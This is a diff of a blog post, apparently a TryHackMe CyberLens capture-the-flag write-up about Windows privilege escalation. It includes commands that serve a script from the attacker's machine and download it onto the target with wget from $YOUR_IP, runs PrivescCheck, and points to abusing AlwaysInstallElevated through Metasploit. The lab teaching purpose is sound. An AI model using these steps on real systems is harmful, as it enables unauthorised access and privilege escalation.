mrashco/mrash.co/content/post/2024/cyberlens.md

 I'll be honest.
 I got stuck here, like really stuck.

-For me, the *hint* didn't help "RDP will make your life easier.
-If Remmina is not working, try this: rdesktop -u [user] -p [password] -N cyberlens.thm:3389"
+The *hint* didn't help **RDP will make your life easier.
+If Remmina is not working, try this: rdesktop -u [user] -p [password] -N cyberlens.thm:3389**.

-Sticking with a PowerShell terminal was the way to go for me.
+For me, sticking with PowerShell was the way to go.

-Let's try some automated enumeration now.

-After a few rabbit holes, took a step back and watched [Windows Privilege Escalation Guide](https://youtu.be/w3v_ydcw3T4?si=llF_n2L0og3RkSon).
+But after a few rabbit holes, I took a step back and watched [Windows Privilege Escalation Guide](https://youtu.be/w3v_ydcw3T4?si=llF_n2L0og3RkSon).

-So tried a new (for me) script called [PrivesCheck](https://github.com/itm4n/PrivescCheck).
+Which led to a new (for me) script called [PrivesCheck](https://github.com/itm4n/PrivescCheck).

 ![Download PrivescCheck Script](https://i.imgur.com/kWKbJc2.png)

+If you're following along at home.

 Start a Python Web Server with `python -m http.server 8000` where you download the script.

 ![Transfer PrivescCheck Script](https://i.imgur.com/6LhBV1v.png)

-On the Target Machine, put the script where you have write permissions.
-Like the Desktop.
+Then on the Target Machine, put the script where you have write permissions.
+Like the Desktop or Temp.

-Then you can use `wget http://$YOUR_IP:8000/$file -UseBasicParsing -OutFile $file`
+You can use `wget http://$YOUR_IP:8000/$file -UseBasicParsing -OutFile $file` in PowerShell.

 Go ahead and run the script `. .\PrivescCheck.ps1; Invoke-PrivescCheck`

 Gotta say, I do like the output of PrivescCheck.
-Easy to digest with the summary at the end.
+An easy-to-digest summary is nice.

 ![PrivescCheck Summary](https://i.imgur.com/k4wFGdl.png)

-So what's `AlwaysInstallElevated`???
+So what's `AlwaysInstallElevated`?

+Basically, it allows lower level users to install Windows Packages with system level privileges.

+You see where this is going?

-Luckily, [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) has info about it.
+And luckily, [HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation) has more info about it.

+Would you look at that?

-And there's another metasploit exploit ready to rock for us.
+There's another metasploit exploit ready to rock for us.
 Lovely.

 Exit PowerShell and go back to Meterpreter with `exit` and `exit`.